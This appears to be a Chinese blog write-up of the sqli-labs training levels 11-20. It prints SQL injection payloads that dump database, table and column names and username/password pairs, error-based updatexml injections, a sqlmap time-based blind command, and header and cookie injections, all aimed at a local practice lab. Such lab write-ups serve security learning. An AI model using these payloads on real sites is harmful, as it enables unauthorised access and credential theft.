zoukankan      html  css  js  c++  java
  • sql-ilabs闯关11-20关——通关记录

    sqli-labs闯关11-20关——通关记录

    Less-11

    首先尝试正常登录,based-String,使用admin登录

    ZWM_2E6L`8PRQ_I3GF_G7C2.png

    看上图,测试字段

    admin' order by 2 #

    两个字段

    随后尝试闭合方式,明显单引号报错,猜测是单引号闭合

    直接使用联合查询的方式进行

    0' union select null,database()#    #查询数据库
    0‘ union select null,group_concat(table_name) from information_schema.tables where table_schema='security'# #爆表
    0‘ union select null,group_concat(column_name) from information_schema.columns where table_name='users'#    #爆字段
    0‘ union select null,group_concat(username,password) from security.users#   #爆字段内容
    

      

    BYVR8_ZO7BVV_G1Q_1L_SRF.png

    结束

    Less-12

    测试闭合方式。为")闭合,剩下步骤和Less-11一样

    Less-13

    正常登录无数据回显,但是测试闭合方式')时报错

    S@DUBGJ6I0Y_EYRZPM63ZLX.png

    可以使用报错注入

    admin') and (updatexml(1,concat(0x7e,(select database()),0x7e),1))# #查询数据库
    admin') and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#  #爆表
    admin') and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#     #爆字段
    admin') and (updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1))#    爆字段内容

    KDSG8LV_7_AYQIZZ2HXUWT3.png

    结束

    Less-14

    闭合方式为双引号,其余和Less-13类似

    Less-15

    标题是盲注,无论怎么测试都没有回显,猜测是基于时间的盲注

    直接利用sqlmap跑

    python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-15/" --data "uname=admin&passwd=admin&submit=Submit"  --technique T --dbs --batch

    其中"uname=admin&passwd=admin&submit=Submit"是bp抓包的最后一行

    ~_6W_6D_C931K179MH22R_C.png

    成功,结束

    Less-16

    基于时间的盲注,也可直接采用sqlmap跑

    Less-17

    测试可知,在username处输入时仅有显示图片发生变化,但是在password处输入时会显示报错信息,得知数据是单引号闭合

    直接使用bp抓包后修改数据(利用报错注入),send之后即可看见相应的内容

    W_VSH61UF_U80LR__GB5L40.png

    完成

    Less-18

    在两个输入框测试均无变化

    bp抓包,可以发现修改user-agent后有回显报错,并且查看源码发现是单引号闭合

    keepb1ue' or updatexml(1,concat(0x7e,(database()),0x7e),0) or ' #将user-agent内容修改为此即可

    Less-19

    和上题类似,只是注入点从user-agnet变成了refer

    Less-20

    由题目得知是cookie注入

    Cookie: uname=' union select 1,database(),6 or 1=1 #;

     

     

     

     

    完成

  • 相关阅读:
    C++雾中风景1:友元类与面向对象
    NFS服务器的安装与配置
    未来工作相关
    python 函数
    pycharm、sublime个性化设置
    hadoop中HDFS的NameNode原理
    Cat搭建遇坑记
    美团点评CAT监控平台研究
    阿里sentinel源码研究深入
    阿里熔断限流Sentinel研究
  • 原文地址:https://www.cnblogs.com/yyy-fff/p/13955272.html
Copyright © 2011-2022 走看看